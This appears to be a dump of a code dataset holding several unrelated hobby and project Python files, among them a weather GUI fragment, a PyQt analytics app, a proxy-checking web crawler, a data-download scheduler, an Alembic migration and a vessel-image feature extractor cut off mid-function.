fg='#000000')\r\nday7.place(x=10, y=5)\r\n\r\nseventhimage = Label(seventhframe, bg='#38ACEC')\r\nseventhimage.place(x=7, y=20)\r\n\r\nday7temp = Label(seventhframe, bg='#38ACEC', fg='#00008B', font='arial 10 bold')\r\nday7temp.place(x=-5, y=60)\r\n\r\nroot.mainloop()","repo_name":"varshasmile/gui_weather_forecasting_app","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":11794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"12130210685","text":"#!/usr/bin/env python\n\nimport transformers.adapters.utils\nimport sys\n\ndef strify(x):\n if isinstance(x, list):\n return '|'.join(x)\n else:\n return str(x)\n\ndef geta(x, attr):\n if hasattr(x, attr):\n return strify(getattr(x, attr))\n else:\n return ''\n\nkeys = ['adapter_id', 'source', 'model_name', 'task', 'subtask']\nprint('\\t'.join(keys))\n\ndef adapter2str(a):\n return '\\t'.join(map(str, [geta(a, at) for at in keys]))\n\nfor a in transformers.adapters.utils.list_adapters():\n print(adapter2str(a))\n","repo_name":"kwchurch/gft","sub_path":"gft/gft_internals/huggingface_hub/list_adapters.py","file_name":"list_adapters.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"16"} +{"seq_id":"19485289382","text":"\nimport sys\nsys.path.append('../')\nfrom pycore.tikzeng import *\n\n# defined your arch\narch = [\n to_head( '..' ),\n to_cor(),\n to_begin(),\n to_Conv_color_4(\"conv1\", 512, 64, offset=\"(0,0,0)\", to=\"(0,0,0)\", height=64, depth=64, width=2 ),\n\n to_end()\n ]\n\ndef main():\n namefile = str(sys.argv[0]).split('.')[0]\n to_generate(arch, namefile + '.tex' )\n\nif __name__ == '__main__':\n main()\n","repo_name":"Zhenhao-He/PlotNeuralNet-master-improve","sub_path":"pyexamples/text4.py","file_name":"text4.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"38490327874","text":"import sys\n\nfrom PyQt5 import QtWidgets, uic\nfrom wb_an import WbAnalits\nfrom ozon_an import OzonAnalits\nfrom table_analit import analits_month, analits_wb\nfrom month_an import MonthAnalits\n\n\nclass HomeScreen(QtWidgets.QMainWindow):\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n uic.loadUi('uis/home2.ui', self)\n self.pushButton.clicked.connect(self.anal_wb_week)\n self.pushButton_10.clicked.connect(self.anal_ozon_week)\n self.pushButton_3.clicked.connect(self.openWB)\n self.pushButton_4.clicked.connect(self.openOzon)\n self.pushButton_2.clicked.connect(self.exit)\n self.pushButton_5.clicked.connect(self.to_month_res)\n self.routsOzon = []\n self.routsWB = []\n\n def anal_wb_week(self):\n route = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File', '/', \"Excel (*.xls *.xlsx)\")[0]\n if route:\n try:\n analits_wb(route)\n except:\n self.label_6.setText('

    Ошибка данных

    ')\n self.pushButton.setText('Открыть файлы ❌')\n\n else:\n self.pushButton.setText('Открыть файлы')\n self.label_6.setText('')\n self.st = WbAnalits(route, self)\n self.st.move(self.x() - 230, self.y() - 150)\n self.st.show()\n self.hide()\n\n def anal_ozon_week(self):\n route = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File', '/', \"Excel (*.xls *.xlsx)\")[0]\n if route:\n self.st = OzonAnalits(route, self)\n self.st.move(self.x() - 230, self.y() - 150)\n self.st.show()\n self.hide()\n\n def openWB(self):\n self.routsWB = QtWidgets.QFileDialog.getOpenFileNames(self, 'Open File', 'results_wb/', \"Excel (*.xls *.xlsx)\")[\n 0]\n try:\n a = 5 / len(self.routsWB)\n for route in self.routsWB:\n analits_month(route)\n except:\n self.label_4.setText('

    Ошибка дан��ых

    ')\n self.pushButton_3.setText('Открыть файлы ❌')\n self.pushButton_5.setEnabled(False)\n else:\n self.label_4.setText(f'Выбрано {len(self.routsWB)} файла(-ов)')\n self.pushButton_3.setText('Открыть файлы ✅')\n if self.pushButton_4.text() == 'Открыть файлы ✅':\n self.pushButton_5.setEnabled(True)\n\n def openOzon(self):\n self.routsOzon = \\\n QtWidgets.QFileDialog.getOpenFileNames(self, 'Open File', 'results_ozon/', \"Excel (*.xls *.xlsx)\")[0]\n try:\n a = 5 / len(self.routsOzon)\n for route in self.routsOzon:\n analits_month(route)\n except:\n self.label_5.setText('

    Ошибка данных

    ')\n self.pushButton_4.setText('Открыть файлы ❌')\n self.pushButton_5.setEnabled(False)\n else:\n self.label_5.setText(f'Выбрано {len(self.routsOzon)} файла(-ов)')\n self.pushButton_4.setText('Открыть файлы ✅')\n if self.pushButton_3.text() == 'Открыть файлы ✅':\n self.pushButton_5.setEnabled(True)\n\n def to_month_res(self):\n self.st = MonthAnalits(self.routsWB, self.routsOzon, self)\n self.st.move(self.x() - 230, self.y() - 150)\n self.st.show()\n self.label_4.setText('')\n self.label_5.setText('')\n self.pushButton_3.setText('Открыть файлы')\n self.pushButton_4.setText('Открыть файлы')\n self.pushButton_5.setEnabled(False)\n self.routsWB = []\n self.routsOzon = []\n self.hide()\n\n def exit(self):\n exit(sys.argv)\n","repo_name":"ttema4/WbOzonAnalitics","sub_path":"home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35654806944","text":"class Animal():\n def __init__(self, name, weight, color, sex):\n self.__name = name\n self.__weight = weight\n self.__color = color\n self.__sex = sex\n def get_animal(self):\n print(f'Name: {self.__name}, Color: {self.__color}, Sex: {self.__sex}, Weight: {self.__weight}, Legs: {self.legs}')\n\n\nclass Horse(Animal):\n legs = 'Hard'\n\n\nclass Dog(Animal):\n legs = 'Soft'\n\n\nclass Cat(Animal):\n legs = 'Furry'\n\n\nhorse = Horse('Bolt', 250, 'Brown', 'Male')\ndog = Dog('Breety', 25, 'Black', 'Female')\ncat = Cat('Rich', 6, 'Multicolor', 'Male')\n\nprint(horse.get_animal(), dog.get_animal(), cat.get_animal())","repo_name":"NightKiller152/Python_examples","sub_path":"SimplePython/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4501736621","text":"import os\n\nimport numpy as np\nimport pandas as pd\n\nfrom algorithm.core.data_io import CsvReader, ValidationNumpyDataset\nfrom algorithm.core.encryption_param import get_encryption_param\nfrom algorithm.core.tree.tree_param import XGBTreeParam\nfrom algorithm.framework.vertical.vertical_model_base import VerticalModelBase\nfrom common.utils.logger import logger\n\n\nclass VerticalXgboostBase(VerticalModelBase):\n def __init__(self, train_conf: dict, is_label_trainer: bool = False, *args, **kwargs):\n super().__init__(train_conf)\n self.train_conf = train_conf\n self.train_features, self.train_label = None, None\n self.val_features, self.val_label = None, None\n self.xgb_config = None\n self.is_label_trainer = is_label_trainer\n self.feature_importances_ = {}\n self.__init_xgb_config()\n self.__init_data()\n self.__convert_to_binned_data()\n\n def __init_data(self) -> None:\n \"\"\" Init data, include features and label.\n\n Returns: None\n\n \"\"\"\n train_reader: CsvReader = self.__load_data(self.input_trainset)\n validation_reader: CsvReader = self.__load_data(self.input_valset)\n if self.is_label_trainer:\n self.train_features, self.train_label = train_reader.features(type=\"pandas.dataframe\"), train_reader.label()\n self.val_features, self.val_label = validation_reader.features(type=\"pandas.dataframe\"), validation_reader.label()\n self.train_feature_name, self.valid_feature_name = train_reader.feature_names(), validation_reader.feature_names()\n else:\n self.train_features = train_reader.features(type=\"pandas.dataframe\")\n self.val_features = validation_reader.features(type=\"pandas.dataframe\")\n\n self.train_ids = train_reader.ids\n self.val_ids = validation_reader.ids\n\n self.train_features.replace({np.nan: 0, self.xgb_config.missing_value: 0}, inplace=True)\n self.val_features.replace({np.nan: 0, self.xgb_config.missing_value: 0}, inplace=True)\n \n self.bs = self.train_params.get(\"validation_batch_size\")\n self.train_dataset = ValidationNumpyDataset(batch_size=self.bs, dataset=self.train_features.to_numpy().astype(np.float32),\n label=self.train_label)\n self.val_dataset = ValidationNumpyDataset(batch_size=self.bs, dataset=self.val_features.to_numpy().astype(np.float32), \n label=self.val_label)\n \n def __convert_to_binned_data(self):\n out = pd.Series(self.train_features.columns).apply(\n lambda x: pd.cut(self.train_features[x], bins=self.xgb_config.num_bins, retbins=True, labels=range(self.xgb_config.num_bins))\n )\n \n if self.xgb_config.num_bins <= 256:\n dtype = np.uint8\n elif self.xgb_config.num_bins <= 1e16:\n dtype = np.uint16\n else:\n dtype = np.uint32\n \n self.train_features = pd.DataFrame([out[i][0] for i in range(len(out))], dtype=dtype).T\n self.split_points = [out[i][1][1:-1] for i in range(len(out))]\n \n def __load_data(self, config) -> CsvReader:\n \"\"\" Load data from dataset config.\n\n Args:\n argv: Dataset config.\n\n Returns: CsvReader.\n\n \"\"\"\n if len(config) > 1:\n logger.warning(\"More than one dataset is not supported.\")\n \n config = config[0]\n if config[\"type\"] == \"csv\":\n data_reader = CsvReader(path=os.path.join(config[\"path\"],config[\"name\"]), has_id=config[\"has_id\"], has_label=config[\"has_label\"])\n else:\n raise NotImplementedError(\"Dataset type {} is not supported.\".format(config[\"type\"]))\n return data_reader\n\n def __init_xgb_config(self) -> None:\n \"\"\" Init xgboost config.\n\n Returns: None\n\n \"\"\"\n default_config = self.train_info.get(\"params\")\n encryption_method = list(default_config.get(\"encryption_params\").keys())[0]\n encryption_param = default_config.get(\"encryption_params\")[encryption_method]\n\n self.xgb_config = XGBTreeParam(task_type=default_config.get(\"task_type\"),\n loss_param=default_config.get(\"lossfunc_config\"), #(\"BCEWithLogits\"),\n num_trees=default_config.get(\"num_trees\"),\n learning_rate=default_config.get(\"learning_rate\"),\n gamma=default_config.get(\"gamma\"),\n lambda_=default_config.get(\"lambda_\"),\n max_depth=default_config.get(\"max_depth\"),\n num_bins=default_config.get(\"num_bins\"),\n min_split_gain=default_config.get(\"min_split_gain\"),\n min_sample_split=default_config.get(\"min_sample_split\"),\n min_leaf_node=default_config.get(\"min_leaf_node\"),\n feature_importance_type=default_config.get(\"feature_importance_type\"),\n run_goss=default_config.get(\"run_goss\"),\n top_rate=default_config.get(\"top_rate\"),\n other_rate=default_config.get(\"other_rate\"),\n validation_freqs=1,\n metrics=default_config.get(\"metric_config\"),\n early_stopping_param=default_config.get(\"early_stopping_params\"),\n encryption_param=get_encryption_param(encryption_method, encryption_param),\n subsample_feature_rate=default_config.get(\"subsample_feature_rate\"),\n missing_value=float('inf'),\n max_num_cores=default_config.get(\"max_num_cores\"),\n col_batch=default_config.get(\"col_batch\"),\n row_batch=default_config.get(\"row_batch\"))\n","repo_name":"OneTarnished/XFL","sub_path":"python/algorithm/framework/vertical/xgboost/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"28020602988","text":"import threading\nimport asyncio\n\n@asyncio.coroutine\ndef hello(x):\n print('Hello world!%s (%s)' % (x ,threading.currentThread()))\n yield print('----')\n print('Hello again!%s (%s)' % (x, threading.currentThread()))\n\nloop = asyncio.get_event_loop()\ntasks = [hello(s) for s in range(5)]\nloop.run_until_complete(asyncio.wait(tasks))\nloop.close()\nasyncio.open_connection()","repo_name":"MXblade/PythonStudy","sub_path":"ThreadRel/asynciotest.py","file_name":"asynciotest.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38117598593","text":"import json\nimport re\nimport time\nimport pymysql\nimport requests\nrequests.packages.urllib3.disable_warnings()\n\ndef read_proxys():\n db = pymysql.connect(\n host=\"localhost\",\n port=3306,\n user=\"root\",\n password=\"myron123\",\n database=\"crawel\",\n )\n cursor = db.cursor()\n sql = \"select distinct target from proxy;\"\n cursor.execute(sql)\n proxys = cursor.fetchall()\n db.commit()\n return proxys\nproxy_list_bak = []\ndef proxy_list():\n proxys = read_proxys()\n proxy_list = []\n for i in range(0,len(proxys)-1):\n try:\n proxy = proxys[i][0]\n proxy = eval(proxy)\n print(proxy)\n headers = {\n \"User-Agent\": 'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',\n }\n time.sleep(2.5)\n p = requests.get('http://icanhazip.com', headers=headers, proxies=proxy, timeout=30)\n if p.status_code == 200:\n proxy = {'{}'.format(proxy[0]): '{}'.format(proxy[1])}\n print(proxy)\n tg = list(proxy.values())[0].split(':')[1][2:].split('.')\n tg = str(tg[0]) + \".\" + str(tg[1]) + \".\" + str(tg[2])\n print(tg)\n if tg in p.text.strip():\n proxy_list.append(proxy)\n proxy_list_bak.append(proxy)\n print(proxy_list)\n except Exception as e:\n print(e)\n return proxy_list\n# print(proxy_list())\n\ndef crawel_one_page(url):\n proxy = {'http': 'http://51.158.186.242:8811'}\n headers = {\n \"User-Agent\": 'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',\n 'Connection': 'close'\n }\n res = requests.get(url, headers=headers, verify=False,\n allow_redirects=False, timeout=15,proxies =proxy)\n if res.status_code == 200:\n print(res.headers['location'])\n return res.text\n return None\ndef parse_one_page():\n pass\ndef main():\n url = \"https://36kr.com/newsflashes\"\n html = crawel_one_page(url)\n print(html)\n # if html is not None:\n # for content in parse_one_page(html):\n\nmain()","repo_name":"myron123456/python_project","sub_path":"python爬虫/爬虫练习/crawel_36kr.py","file_name":"crawel_36kr.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6397430824","text":"s = input()\n\ngroup0 = 0\ngroup1 = 0\n\nif s[0] == '0':\n group0 += 1\nelse:\n group1 += 1\n\nfor i in range(1, len(s)):\n # 숫자가 바뀌는 순간 집단의 개수로 하나 체크\n if s[i-1] != s[i]:\n if s[i] == '0':\n group0 += 1\n else:\n group1 += 1\n \n\n# 연속된 0의 집단과 연속된 1의 집단 중 더 작은 집단의 개수\nprint(min(group0, group1))","repo_name":"kminji127/Algorithm","sub_path":"01_Greedy/[BOJ] 1439_뒤집기.py","file_name":"[BOJ] 1439_뒤집기.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36490756721","text":"from typing import List\nimport time\nimport json\nimport schedule\nimport sys\nimport os\nimport logging\n\n# logger initialization\nLOGGER = logging.getLogger(__name__)\nlogging.basicConfig(\n format=\"%(asctime)s %(name)-12s %(levelname)-8s %(message)s\", level=logging.INFO)\n\nsys.path.append(os.path.abspath('./download'))\n\nfrom APIClient import NaiadesClient\n\nclass DownloadScheduler():\n clients: List[\"NaiadesClient\"]\n\n def __init__(self, configuration_path: str = None) -> None:\n self.configuration(configurationPath=configuration_path)\n\n def configuration(self, configurationPath: str = None) -> None:\n # Read config file\n full_path = \"config/\" + configurationPath\n with open(full_path) as data_file:\n conf = json.load(data_file)\n\n conf_clients = conf[\"clients\"]\n self.clients = []\n\n for conf_client in conf_clients:\n path = \"config/\" + conf_client\n client = NaiadesClient(configurationPath=path)\n self.clients.append(client)\n\n # Schedule obtain calls (see schedule module documentation)\n for client in self.clients:\n #print(client.entity_id)\n if(client.seconds_between_samples is not None):\n #print(\"nope\")\n schedule.every(client.seconds_between_samples).seconds.do(client.obtain)\n elif(client.second_in_minute is not None):\n if(client.period is not None):\n schedule.every(client.period).minutes.at(client.second_in_minute).do(client.obtain)\n else:\n schedule.every().minute.at(client.second_in_minute).do(client.obtain)\n elif(client.minute_in_hour is not None):\n #print(\"minute\")\n if(client.period is not None):\n schedule.every(client.period).hours.at(client.minute_in_hour).do(client.obtain)\n else:\n schedule.every().hour.at(client.minute_in_hour).do(client.obtain)\n elif(client.hour_in_day is not None):\n #print(\"hour_in_day\")\n if(client.period is not None):\n schedule.every(client.period).days.at(client.hour_in_day).do(client.obtain)\n else:\n schedule.every().day.at(client.hour_in_day).do(client.obtain)\n else:\n LOGGER.info(\"Client {} cant be scheduled.\".format(client.entity_id))\n\n def run(self) -> None:\n # When started run all jobs (download data till now)\n schedule.run_all()\n\n while True:\n # run_pending obtain calls\n schedule.run_pending()\n time.sleep(1)\n","repo_name":"naiades-jsi/FIWARE-adapter","sub_path":"download/downloadScheduler.py","file_name":"downloadScheduler.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26645528884","text":"# headers.py\n\n\nclass Headers:\n \"\"\"\n Insert docstring here\n \"\"\"\n def __init__(self, title_header, timestamp_header, last_accessed_header,\n times_accessed_header, tags_header, metadata_header):\n \"\"\"\n Insert docstring here\n \"\"\"\n self.title_header = title_header\n self.timestamp_header = timestamp_header\n self.last_accessed_header = last_accessed_header\n self.times_accessed_header = times_accessed_header\n self.tags_header = tags_header\n self.metadata_header = metadata_header\n\n def get_prefixes(self):\n \"\"\"\n Returns list of the headers' prefixes\n \"\"\"\n prefixes = []\n prefixes.append(self.title_header.get_prefix())\n prefixes.append(self.timestamp_header.get_prefix())\n prefixes.append(self.last_accessed_header.get_prefix())\n prefixes.append(self.times_accessed_header.get_prefix())\n prefixes.append(self.tags_header.get_prefix())\n prefixes.append(self.metadata_header.get_prefix())\n return prefixes\n\n def read(self, input_string):\n \"\"\"\n Insert docstring here\n \"\"\"\n self.title_header.read(input_string.splitlines(False)[0])\n self.timestamp_header.read(input_string.splitlines(False)[1])\n self.last_accessed_header.read(input_string.splitlines(False)[2])\n self.times_accessed_header.read(input_string.splitlines(False)[3])\n self.tags_header.read(input_string.splitlines(False)[4])\n self.metadata_header.read(input_string.splitlines(False)[5])\n\n def write(self):\n \"\"\"\n Insert docstring here\n \"\"\"\n\n return self.title_header.write() + self.timestamp_header.write() + \\\n self.last_accessed_header.write() + \\\n self.times_accessed_header.write() + self.tags_header.write() \\\n + self.metadata_header.write()\n","repo_name":"stefodestructo/Notes-Converter","sub_path":"tnotes/headers/headers.py","file_name":"headers.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"9871563136","text":"print('Sequência de Fibonacci')\nn1 = 0\nn2 = 1\na1 = int(input('\\nDigite o número de valores que deseja ver na sequência\\n'))\nprint(f'{n1} -> {n2}',end=' -> ')\ncont = 3\nwhile cont <= a1:\n n3 = n1 + n2\n print(n3,end=' -> ')\n n1 = n2\n n2 = n3\n cont = cont +1\nprint('Fim')","repo_name":"vitorgabrielmoura/Exercises","sub_path":"Python 3/Curso_em_video/d63.py","file_name":"d63.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"30761500387","text":"from .._classdef import TypeMessage\n\n\nclass WsMsgGroupInfo(object):\n \"\"\"\n websocket消息组的相关信息\n \"\"\"\n\n __slots__ = [\n '_group_type',\n '_group_id',\n '_last_msg_id',\n ]\n\n def __init__(self, data_proto: TypeMessage) -> None:\n self._group_type = data_proto.groupType\n self._group_id = data_proto.groupId\n self._last_msg_id = data_proto.lastMsgId\n\n def __repr__(self) -> str:\n return str(\n {\n 'group_type': self._group_type,\n 'group_id': self._group_id,\n 'last_msg_id': self._last_msg_id,\n }\n )\n\n @property\n def group_type(self) -> int:\n \"\"\"\n 消息组类别\n \"\"\"\n\n return self._group_type\n\n @property\n def group_id(self) -> int:\n \"\"\"\n 消息组id\n \"\"\"\n\n return self._group_id\n\n @property\n def last_msg_id(self) -> int:\n \"\"\"\n 最后一条消息的id\n \"\"\"\n\n return self._last_msg_id\n","repo_name":"Starry-OvO/aiotieba","sub_path":"aiotieba/api/init_websocket/_classdef.py","file_name":"_classdef.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":249,"dataset":"github-code","pt":"16"} +{"seq_id":"8994136245","text":"#!/usr/bin/env python3\n#-*- encoding: UTF-8 -*-\n\ndef main():\n try:\n number = int(input(\"Informe um número inteiro: \"))\n except:\n print(\"Apenas valores numéricos devem ser informados!\")\n if(number < 0):\n print(\"No conjunto dos reais, o cálculo de raízes de índice par só é possível com números positivos.\")\n else:\n print(\"A raíz quadrada de %d é %d.\" %(number, int(number**(1/2))))\nif(__name__ == \"__main__\"):\n main()\n","repo_name":"luizfelipe1914/Listas-Python","sub_path":"Lista 02/Questao2.py","file_name":"Questao2.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11166015158","text":"\"\"\"Move banphrases from filters to the new banphrase table\n\nRevision ID: 1e79c9c63\nRevises: 15712d19833\nCreate Date: 2015-12-24 23:26:41.098033\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '1e79c9c63'\ndown_revision = '15712d19833'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\nSession = sessionmaker()\n\nBase = declarative_base()\n\nclass Filter(Base):\n __tablename__ = 'tb_filters'\n\n id = sa.Column(sa.Integer, primary_key=True)\n name = sa.Column(sa.String(128))\n type = sa.Column(sa.String(64))\n action_json = sa.Column('action', sa.dialects.mysql.TEXT)\n extra_extra_args = sa.Column('extra_args', sa.dialects.mysql.TEXT)\n filter = sa.Column(sa.dialects.mysql.TEXT)\n source = sa.Column(sa.dialects.mysql.TEXT)\n enabled = sa.Column(sa.Boolean)\n num_uses = sa.Column(sa.Integer)\n\n\nclass BanphraseData(Base):\n __tablename__ = 'tb_banphrase_data'\n\n banphrase_id = sa.Column(sa.Integer,\n sa.ForeignKey('tb_banphrase.id'),\n primary_key=True,\n autoincrement=False)\n num_uses = sa.Column(sa.Integer, nullable=False, default=0)\n added_by = sa.Column(sa.Integer,\n nullable=True)\n\n def __init__(self, banphrase_id, **options):\n self.banphrase_id = banphrase_id\n self.num_uses = 0\n self.added_by = None\n\n\nclass Banphrase(Base):\n __tablename__ = 'tb_banphrase'\n\n id = sa.Column(sa.Integer, primary_key=True)\n name = sa.Column(sa.String(256), nullable=False, default='')\n phrase = sa.Column(sa.String(256), nullable=False)\n length = sa.Column(sa.Integer, nullable=False, default=300)\n permanent = sa.Column(sa.Boolean, nullable=False, default=False)\n warning = sa.Column(sa.Boolean, nullable=False, default=True)\n notify = sa.Column(sa.Boolean, nullable=False, default=True)\n case_sensitive = sa.Column(sa.Boolean, nullable=False, default=False)\n\n DEFAULT_TIMEOUT_LENGTH = 300\n DEFAULT_NOTIFY = True\n\n def __init__(self, **options):\n self.id = None\n self.name = 'No name'\n self.length = self.DEFAULT_TIMEOUT_LENGTH\n self.permanent = False\n self.warning = True\n self.notify = self.DEFAULT_NOTIFY\n self.case_sensitive = False\n\n\nimport json\n\ndef upgrade():\n bind = op.get_bind()\n session = Session(bind=bind)\n\n for filter in session.query(Filter).filter_by(type='banphrase'):\n action = json.loads(filter.action_json)\n extra_args = {}\n if filter.extra_extra_args:\n extra_args = json.loads(filter.extra_extra_args)\n banphrase = Banphrase()\n banphrase.phrase = filter.filter\n banphrase.length = extra_args['time'] if 'time' in extra_args else 300\n banphrase.permanent = True if 'cb' in action and action['cb'] == 'ban_source' else False\n banphrase.name = filter.name\n banphrase.enabled = filter.enabled\n session.add(banphrase)\n session.commit()\n banphrase.data = BanphraseData(banphrase.id)\n banphrase.data.num_uses = filter.num_uses\n session.add(banphrase.data)\n session.delete(filter)\n\n session.commit()\n\n\ndef downgrade():\n # you're screwed if you want to downgrade EleGiggle\n pass\n","repo_name":"leecopland/bullbot","sub_path":"alembic/versions/1e79c9c63_move_banphrases_from_filters_to_the_new_.py","file_name":"1e79c9c63_move_banphrases_from_filters_to_the_new_.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"75207740807","text":"import os\nimport torch\nimport argparse\nimport cv2\nimport numpy as np\nimport SimpleITK as sitk\nimport pickle\nimport networkx as nx\n\nfrom tqdm import tqdm\n\nimport six\n\nfrom skimage.measure import regionprops\nfrom radiomics import featureextractor\nfrom glob import glob\nfrom tqdm import tqdm\nfrom artery.Artery import _load_graph, ARTERY_CATEGORY\nfrom train_artery_ngm_feat import collate_fn\n\n\nclass FeatureExtractor:\n\n def __init__(self):\n self.__init_config__()\n\n def __init_config__(self):\n extractor = featureextractor.RadiomicsFeatureExtractor()\n extractor.disableAllFeatures()\n extractor.enableFeatureClassByName('firstorder')\n extractor.enableFeatureClassByName('glcm')\n extractor.enableFeatureClassByName('gldm')\n extractor.enableFeatureClassByName('glrlm')\n extractor.enableFeatureClassByName('glszm')\n extractor.enableFeatureClassByName('ngtdm')\n\n print('Extraction parameters:\\n\\t', extractor.settings)\n print('Enabled filters:\\n\\t', extractor.enabledImagetypes)\n print('Enabled features:\\n\\t', extractor.enabledFeatures)\n self.extractor = extractor\n\n def extract_pos_feature(self, vessel_obj, binary_image, original_image):\n features = []\n feature_dict = {}\n # feature 1: number of vessel pixels\n feature_dict['n_pixels'] = np.sum(vessel_obj.vessel_mask == 1)\n features.append(np.sum(vessel_obj.vessel_mask == 1))\n # feature 2: length of centerlines\n feature_dict['n_centerline'] = np.sum(vessel_obj.vessel_centerline == 1)\n features.append(np.sum(vessel_obj.vessel_centerline == 1))\n # feature 5, 6: mean and stand deviation of the intensities within the centerline in grayscale image_x\n # vessel_centerline_roi = original_image * vessel_obj.vessel_centerline\n # features.append(np.mean(vessel_centerline_roi.flatten()[vessel_centerline_roi.flatten() > 0])) # mean\n # features.append(np.std(vessel_centerline_roi.flatten()[vessel_centerline_roi.flatten() > 0])) # std\n # feature 7-10: absolute position of vessel in whole binary image_x\n binary_properties = regionprops(binary_image, original_image)\n binary_center_of_mass = binary_properties[0].centroid\n binary_weighted_center_of_mass = binary_properties[0].weighted_centroid\n\n vessel_properties = regionprops(vessel_obj.vessel_mask, original_image)\n vessel_center_of_mass = vessel_properties[0].centroid\n vessel_weighted_center_of_mass = vessel_properties[0].weighted_centroid\n\n feature_dict[\"x_center\"] = vessel_center_of_mass[0] / binary_center_of_mass[0]\n feature_dict[\"y_center\"] = vessel_center_of_mass[1] / binary_center_of_mass[1]\n feature_dict[\"weighted_x_center\"] = vessel_weighted_center_of_mass[0] / binary_weighted_center_of_mass[0]\n feature_dict[\"weighted_y_center\"] = vessel_weighted_center_of_mass[1] / binary_weighted_center_of_mass[1]\n features.append(vessel_center_of_mass[0] / binary_center_of_mass[0])\n features.append(vessel_center_of_mass[1] / binary_center_of_mass[1])\n features.append(vessel_weighted_center_of_mass[0] / binary_weighted_center_of_mass[0])\n features.append(vessel_weighted_center_of_mass[1] / binary_weighted_center_of_mass[1])\n\n # feature 11-18: absolute position of start and end point to center of binary image_x\n if vessel_obj.node1.x < vessel_obj.node2.x:\n features.append(vessel_obj.node1.x / binary_center_of_mass[0])\n features.append(vessel_obj.node1.y / binary_center_of_mass[1])\n features.append(vessel_obj.node1.x / binary_weighted_center_of_mass[0])\n features.append(vessel_obj.node1.y / binary_weighted_center_of_mass[1])\n features.append(vessel_obj.node2.x / binary_center_of_mass[0])\n features.append(vessel_obj.node2.y / binary_center_of_mass[1])\n features.append(vessel_obj.node2.x / binary_weighted_center_of_mass[0])\n features.append(vessel_obj.node2.y / binary_weighted_center_of_mass[1])\n\n feature_dict[\"p1_x_center\"] = vessel_obj.node1.x / binary_center_of_mass[0]\n feature_dict[\"p1_y_center\"] = vessel_obj.node1.x / binary_center_of_mass[0]\n feature_dict[\"p1_x_weighted_center\"] = vessel_obj.node1.x / binary_center_of_mass[0]\n feature_dict[\"p1_y_weighted_center\"] = vessel_obj.node1.x / binary_center_of_mass[0]\n feature_dict[\"p2_x_center\"] = vessel_obj.node2.x / binary_center_of_mass[0]\n feature_dict[\"p2_y_center\"] = vessel_obj.node2.y / binary_center_of_mass[1]\n feature_dict[\"p2_x_weighted_center\"] = vessel_obj.node2.x / binary_weighted_center_of_mass[0]\n feature_dict[\"p2_y_weighted_center\"] = vessel_obj.node2.y / binary_weighted_center_of_mass[1]\n else:\n features.append(vessel_obj.node2.x / binary_center_of_mass[0])\n features.append(vessel_obj.node2.y / binary_center_of_mass[1])\n features.append(vessel_obj.node2.x / binary_weighted_center_of_mass[0])\n features.append(vessel_obj.node2.y / binary_weighted_center_of_mass[1])\n features.append(vessel_obj.node1.x / binary_center_of_mass[0])\n features.append(vessel_obj.node1.y / binary_center_of_mass[1])\n features.append(vessel_obj.node1.x / binary_weighted_center_of_mass[0])\n features.append(vessel_obj.node1.y / binary_weighted_center_of_mass[1])\n\n feature_dict[\"p1_x_center\"] = vessel_obj.node2.x / binary_center_of_mass[0]\n feature_dict[\"p1_y_center\"] = vessel_obj.node2.y / binary_center_of_mass[1]\n feature_dict[\"p1_x_weighted_center\"] = vessel_obj.node2.x / binary_weighted_center_of_mass[0]\n feature_dict[\"p1_y_weighted_center\"] = vessel_obj.node2.y / binary_weighted_center_of_mass[1]\n feature_dict[\"p2_x_center\"] = vessel_obj.node1.x / binary_center_of_mass[0]\n feature_dict[\"p2_y_center\"] = vessel_obj.node1.y / binary_center_of_mass[1]\n feature_dict[\"p2_x_weighted_center\"] = vessel_obj.node1.x / binary_weighted_center_of_mass[0]\n feature_dict[\"p2_y_weighted_center\"] = vessel_obj.node1.y / binary_weighted_center_of_mass[1]\n\n # feature 